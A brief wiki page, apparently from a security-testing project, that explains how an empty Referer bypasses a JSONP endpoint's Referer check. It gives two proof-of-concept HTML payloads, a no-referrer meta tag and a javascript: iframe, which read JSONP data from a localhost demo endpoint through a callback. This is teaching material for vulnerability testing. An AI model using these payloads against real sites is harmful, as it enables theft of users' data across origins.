JoyChou edited this page Jan 29, 2019 · 8 revisions

Sometimes, for convenience during testing, developers leave a JSONP endpoint reachable by direct access (no Referer), and only apply a Referer restriction to non-direct access. Normally, requests initiated by the front end carry a Referer by default, so this page briefly shows how to bypass that restriction with an empty Referer.

Poc 1

<html>
<meta name="referrer" content="no-referrer" />

<script>
	function test(data){
		alert(data.name);
	}
</script>
<script src=http://localhost:8080/jsonp/emptyReferer?callback=test></script>
</html>

Poc 2

<iframe src="javascript:'<script>function test(data){alert(data.name);}</script><script src=http://localhost:8080/jsonp/emptyReferer?callback=test></script>'"></iframe>

Reference
